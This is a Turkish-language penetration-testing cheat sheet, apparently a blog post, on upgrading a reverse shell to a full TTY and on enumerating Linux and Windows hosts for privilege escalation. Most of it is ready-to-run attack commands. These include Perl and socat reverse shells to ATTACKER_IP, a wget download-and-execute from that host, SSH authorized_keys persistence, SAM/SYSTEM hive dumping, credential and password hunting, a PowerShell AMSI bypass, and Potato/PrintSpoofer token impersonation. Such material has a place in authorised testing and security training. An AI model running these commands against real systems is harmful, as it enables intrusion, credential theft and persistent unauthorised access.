Pentest Cheat Sheet: TTY Upgrade & Enumeration
İçindekiler
TTY Shell Upgrade
Neden TTY Upgrade Gerekli?
Reverse shell aldığında genellikle “dumb shell” alırsın. Bu shell’de:
- Tab completion çalışmaz
- Yukarı ok ile önceki komutlara erişemezsin
- Ctrl+C yapınca shell ölür
- nano, vim gibi interaktif programlar çalışmaz
- Bazı komutlar “no tty” hatası verir
Python ile TTY Upgrade (En Yaygın)
# Python 3
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Python 2
python -c 'import pty;pty.spawn("/bin/bash")'
# Hangisi varsa
python -c 'import pty;pty.spawn("/bin/bash")' 2>/dev/null || python3 -c 'import pty;pty.spawn("/bin/bash")'
Full Interactive TTY (En İyi Yöntem)
# 1. Önce PTY spawn et
python3 -c 'import pty;pty.spawn("/bin/bash")'
# 2. Ctrl+Z ile background'a al
# [Ctrl+Z]
# 3. Kendi terminalinde şunu yaz
stty raw -echo; fg
# 4. Enter'a iki kez bas, sonra:
export TERM=xterm-256color
export SHELL=/bin/bash
# 5. Terminal boyutunu ayarla (kendi terminalinde `stty size` ile öğren)
stty rows 40 cols 160
Script Komutu ile Upgrade
# /bin/bash yoksa
script /dev/null -c bash
# Alternatif
script -qc /bin/bash /dev/null
Diğer Diller ile TTY Spawn
# Perl
perl -e 'exec "/bin/bash";'
perl -e 'use Socket;$i="ATTACKER_IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
# Ruby
ruby -e 'exec "/bin/bash"'
# Lua
lua -e "os.execute('/bin/bash')"
# IRB (Ruby)
exec "/bin/bash"
# vi/vim içinden
:!bash
:set shell=/bin/bash
:shell
# nmap (eski versiyonlar)
nmap --interactive
!sh
# awk
awk 'BEGIN {system("/bin/bash")}'
# find
find / -exec /bin/bash \; -quit
# expect
expect -c 'spawn bash; interact'
Socat ile Full TTY (En Temizi)
# Attacker makinede listener
socat file:`tty`,raw,echo=0 tcp-listen:4444
# Target makinede (socat varsa)
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:4444
# Socat yoksa, transfer et
wget -q http://ATTACKER_IP/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:4444
rlwrap ile Upgrade (Attacker Tarafı)
# Listener başlatırken rlwrap kullan
rlwrap nc -lvnp 4444
# Bu sayede ok tuşları ve history çalışır
SSH Key ile Kalıcı Erişim
# Kendi public key'ini hedefin authorized_keys dosyasına ekle
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh
# Artık SSH ile bağlanabilirsin
ssh user@target
Linux Enumeration
Sistem Bilgisi
# Temel bilgiler
hostname
uname -a
cat /etc/os-release
cat /etc/issue
cat /proc/version
lsb_release -a
# Kernel versiyonu (exploit aramak için)
uname -r
# Architecture
arch
uname -m
# Uptime ve load
uptime
cat /proc/loadavg
Kullanıcı Bilgileri
# Mevcut kullanıcı
whoami
id
groups
# Tüm kullanıcılar
cat /etc/passwd
cat /etc/passwd | grep -E "sh$" # Shell'i olanlar
cat /etc/passwd | cut -d: -f1 # Sadece kullanıcı adları
# Gruplar
cat /etc/group
# Sudo yetkileri
sudo -l
cat /etc/sudoers 2>/dev/null
cat /etc/sudoers.d/* 2>/dev/null
# Login history
last
lastlog
w
who
# Şu an bağlı kullanıcılar
users
Şifre ve Credential Hunting
# Shadow dosyası (root gerekir)
cat /etc/shadow
# History dosyaları
cat ~/.bash_history
cat ~/.zsh_history
cat ~/.mysql_history
cat ~/.nano_history
history
# Tüm history dosyaları
find / -name "*history*" 2>/dev/null
# Config dosyalarında şifre arama
grep -r "password" /etc/ 2>/dev/null
grep -r "pass" /var/www/ 2>/dev/null
grep -r "pwd" /opt/ 2>/dev/null
grep -ri "password" --include="*.php" /var/www/ 2>/dev/null
grep -ri "password" --include="*.conf" /etc/ 2>/dev/null
grep -ri "password" --include="*.xml" / 2>/dev/null
# SSH keyleri
find / -name "id_rsa" 2>/dev/null
find / -name "id_dsa" 2>/dev/null
find / -name "id_ecdsa" 2>/dev/null
find / -name "id_ed25519" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null
ls -la ~/.ssh/
# AWS credentials
cat ~/.aws/credentials
cat ~/.aws/config
# Docker
cat ~/.docker/config.json
# Git credentials
cat ~/.git-credentials
find / -name ".git" -type d 2>/dev/null
# Database credentials
cat /var/www/html/wp-config.php 2>/dev/null
cat /var/www/html/configuration.php 2>/dev/null
find / -name "*.sql" 2>/dev/null
find / -name "config.php" 2>/dev/null
find / -name "db.php" 2>/dev/null
find / -name "database.yml" 2>/dev/null
SUID/SGID Binaries
# SUID dosyaları (PrivEsc için kritik!)
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# SGID dosyaları
find / -perm -2000 -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
# Her ikisi de
find / -perm -6000 -type f 2>/dev/null
# GTFOBins'de kontrol edilecek yaygın SUID'ler
# vim, nano, find, bash, nmap, python, perl, ruby, awk, less, more, man, ftp, socat...
Capabilities
# Capability'leri listele
getcap -r / 2>/dev/null
# Önemli capability'ler:
# cap_setuid - UID değiştirebilir (root olabilir!)
# cap_net_raw - Raw socket açabilir
# cap_dac_override - File permission bypass
# cap_dac_read_search - Herşeyi okuyabilir
Cron Jobs
# Sistem cron'ları
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /etc/cron.daily/
ls -la /etc/cron.hourly/
ls -la /etc/cron.weekly/
ls -la /etc/cron.monthly/
# Kullanıcı cron'ları
crontab -l
cat /var/spool/cron/crontabs/*
# Systemd timers
systemctl list-timers --all
# Çalışan cron process'leri izle
watch -n 1 'ps aux | grep -v "grep" | grep cron'
# Pspy kullan (process monitor)
./pspy64
Network Bilgileri
# IP adresleri
ip a
ifconfig
hostname -I
# Routing
ip route
route -n
netstat -rn
# Açık portlar ve bağlantılar
netstat -tulpn
netstat -antup
ss -tulpn
ss -antup
# Dinleyen servisler
lsof -i -P -n
# ARP tablosu
arp -a
ip neigh
# DNS
cat /etc/resolv.conf
cat /etc/hosts
# Firewall kuralları
iptables -L -n
iptables -S
cat /etc/iptables/rules.v4
ufw status
Process ve Servisler
# Çalışan process'ler
ps aux
ps -ef
ps auxwww
top
htop
# Belirli process ara
ps aux | grep -i "root"
ps aux | grep -i "mysql"
# Process ağacı
pstree
# Servisler
systemctl list-units --type=service
systemctl list-units --type=service --state=running
service --status-all
# Port dinleyen process'ler
lsof -i :80
lsof -i :443
fuser 80/tcp
Dosya Sistemi
# Mount'lar
mount
df -h
cat /etc/fstab
# Yazılabilir dizinler
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
# World-writable dosyalar
find / -perm -2 -type f 2>/dev/null
find / -type f -perm -o+w 2>/dev/null
# Belirli kullanıcıya ait dosyalar
find / -user root -perm -4000 2>/dev/null
find / -user www-data 2>/dev/null
# Son değiştirilen dosyalar
find / -mmin -10 2>/dev/null # Son 10 dakika
find / -mtime -1 2>/dev/null # Son 1 gün
# Büyük dosyalar
find / -size +100M -type f 2>/dev/null
# Gizli dosyalar
find / -name ".*" -type f 2>/dev/null
# Backup dosyaları
find / -name "*.bak" 2>/dev/null
find / -name "*.old" 2>/dev/null
find / -name "*.backup" 2>/dev/null
find / -name "*~" 2>/dev/null
Yüklü Yazılımlar
# Debian/Ubuntu
dpkg -l
apt list --installed
# RHEL/CentOS
rpm -qa
yum list installed
# Arch
pacman -Q
# Manuel kontrol
which python python3 perl ruby gcc nc ncat netcat wget curl nmap
ls /usr/bin/ | head -50
ls /usr/local/bin/
Container/Virtualization
# Docker içinde miyiz?
cat /proc/1/cgroup | grep docker
ls -la /.dockerenv
hostname # Rastgele karakter dizisi genelde container
# Docker socket erişimi (PrivEsc!)
ls -la /var/run/docker.sock
# LXC/LXD
cat /proc/1/cgroup | grep lxc
# Kubernetes
ls -la /var/run/secrets/kubernetes.io/
env | grep -i kube
Otomatik Enumeration Araçları
# LinPEAS (en kapsamlı)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
./LinEnum.sh -t
# Linux Smart Enumeration
./lse.sh -l 1
# Unix-privesc-check
./unix-privesc-check standard
# Linenum
./linenum.sh
Windows Enumeration
Sistem Bilgisi
# Temel bilgiler
systeminfo
hostname
whoami
# OS versiyonu
ver
wmic os get caption,version,buildnumber
# Hotfix'ler (eksik patch = exploit!)
wmic qfe list
wmic qfe get Caption,Description,HotFixID,InstalledOn
# Architecture
echo %PROCESSOR_ARCHITECTURE%
[Environment]::Is64BitOperatingSystem
Kullanıcı Bilgileri
# Mevcut kullanıcı
whoami
whoami /all
whoami /priv # Privilege'lar (kritik!)
whoami /groups
# Tüm kullanıcılar
net user
net user administrator
Get-LocalUser
# Gruplar
net localgroup
net localgroup administrators
Get-LocalGroup
Get-LocalGroupMember Administrators
# Domain bilgisi
net user /domain
net group /domain
net group "Domain Admins" /domain
# Aktif oturumlar
query user
qwinsta
Privilege Escalation İçin Kritik Privilege’lar
# Bunları gördüğünde sevin:
# SeImpersonatePrivilege → Potato attacks
# SeAssignPrimaryToken → Potato attacks
# SeBackupPrivilege → Dosya okuma
# SeRestorePrivilege → Dosya yazma
# SeTakeOwnershipPrivilege → Ownership alma
# SeDebugPrivilege → Process memory erişimi
# SeLoadDriverPrivilege → Driver yükleme
whoami /priv
Şifre ve Credential Hunting
# SAM ve SYSTEM (hash dump için)
reg save hklm\sam c:\sam
reg save hklm\system c:\system
# Unattend.xml (kurulum şifreleri)
dir /s *unattend.xml 2>nul
dir /s *sysprep.xml 2>nul
dir /s *unattended.xml 2>nul
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattended.xml
type C:\Windows\Panther\Unattend\Unattend.xml
type C:\Windows\System32\Sysprep\Unattend.xml
# GPP (Group Policy Preferences) şifreleri
dir /s Groups.xml 2>nul
findstr /si password \\dc\SYSVOL\*.xml
# Registry'de şifre arama
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
# Dosyalarda şifre arama
findstr /si password *.txt *.ini *.config *.xml
findstr /spin "password" *.*
dir /s *pass* == *cred* == *vnc* == *.config*
# PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Get-History
(Get-PSReadlineOption).HistorySavePath
# Saved credentials
cmdkey /list
vaultcmd /list
# DPAPI credentials
dir /a:h C:\Users\*\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\*\AppData\Roaming\Microsoft\Credentials\
# WiFi şifreleri
netsh wlan show profiles
netsh wlan show profile name="SSID" key=clear
# IIS config
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
type C:\inetpub\wwwroot\web.config
# Putty sessions
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
Servisler ve Zaafiyetler
# Tüm servisler
sc query
wmic service list brief
Get-Service
Get-WmiObject win32_service | select Name,State,PathName
# Unquoted service paths (klasik PrivEsc!)
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\"
Get-WmiObject win32_service | select Name,PathName | Where-Object {$_.PathName -notlike "C:\Windows\*" -and $_.PathName -notlike '"*'}
# Service permissions (accesschk.exe ile)
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
# Servis binary permissions
icacls "C:\Program Files\Service\binary.exe"
# Scheduled tasks
schtasks /query /fo LIST /v
schtasks /query /fo TABLE
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
Network Bilgileri
# IP configuration
ipconfig /all
Get-NetIPConfiguration
# Routing
route print
netstat -rn
# Açık portlar
netstat -ano
netstat -anob # Process ismiyle
Get-NetTCPConnection | where {$_.State -eq "Listen"}
# ARP tablosu
arp -a
# DNS cache
ipconfig /displaydns
# Shares
net share
wmic share list
Get-SmbShare
# Network shares erişimi
net view \\127.0.0.1
net view \\dc01
# Firewall
netsh firewall show state
netsh firewall show config
netsh advfirewall show allprofiles
netsh advfirewall firewall show rule name=all
# Hosts file
type C:\Windows\System32\drivers\etc\hosts
Process ve Uygulamalar
# Çalışan process'ler
tasklist
tasklist /svc
tasklist /v
Get-Process
wmic process list full
# Process'leri detaylı listele
wmic process get name,processid,executablepath
Get-WmiObject Win32_Process | select Name,ProcessId,CommandLine
# Yüklü programlar
wmic product get name,version
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | select DisplayName, DisplayVersion
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | select DisplayName, DisplayVersion
# Startup programları
wmic startup list full
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Dosya Sistemi
# Yazılabilir dizinler
accesschk.exe -uwdqs Users c:\ /accepteula
accesschk.exe -uwdqs "Authenticated Users" c:\ /accepteula
# İlginç dosyalar
dir /s *pass* == *cred* == *vnc* == *.config 2>nul
dir /s /b *.log 2>nul
dir /a /s /b c:\*.kdbx 2>nul # KeePass
# AlwaysInstallElevated (MSI ile PrivEsc)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Yazılabilir PATH dizinleri
echo %PATH%
for %A in ("%path:;=";"%") do @echo %~A
Token ve Impersonation
# Token bilgisi
whoami /priv
# Incognito ile token listele (meterpreter)
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
# PrintSpoofer (SeImpersonatePrivilege varsa)
PrintSpoofer.exe -i -c cmd
# JuicyPotato / RoguePotato / SweetPotato
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t *
Antivirus ve Güvenlik
# Windows Defender
sc query windefend
Get-MpComputerStatus
Get-MpPreference | select -ExpandProperty ExclusionPath
# Tüm AV'ler
wmic /namespace:\\root\securitycenter2 path antivirusproduct get displayname,productstate
# AppLocker
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
# AMSI bypass (PowerShell)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Otomatik Enumeration Araçları
# WinPEAS
.\winPEASany.exe
# PowerUp
. .\PowerUp.ps1
Invoke-AllChecks
# Sherlock (eski ama etkili)
. .\Sherlock.ps1
Find-AllVulns
# JAWS
.\jaws-enum.ps1
# Seatbelt
.\Seatbelt.exe -group=all
# Watson (missing patches)
.\Watson.exe
Hızlı PrivEsc Kontrol Listesi
# 1. Privilege'ları kontrol et
whoami /priv
# SeImpersonate/SeAssignPrimaryToken → Potato
# 2. Unquoted service paths
wmic service get name,pathname | findstr /i /v "C:\Windows"
# 3. AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# 4. Stored credentials
cmdkey /list
# 5. Scheduled tasks
schtasks /query /fo LIST /v | findstr /i "Task To Run"
# 6. Yazılabilir servis binary'leri
accesschk.exe -uwcqv "Users" *
# 7. Registry autorun
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Faydalı Kaynaklar
- GTFOBins: https://gtfobins.github.io/ (Linux SUID/capability exploit)
- LOLBAS: https://lolbas-project.github.io/ (Windows living-off-the-land)
- HackTricks: https://book.hacktricks.xyz/
- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings
- PEASS-ng: https://github.com/carlospolop/PEASS-ng (LinPEAS/WinPEAS)
Yorumlar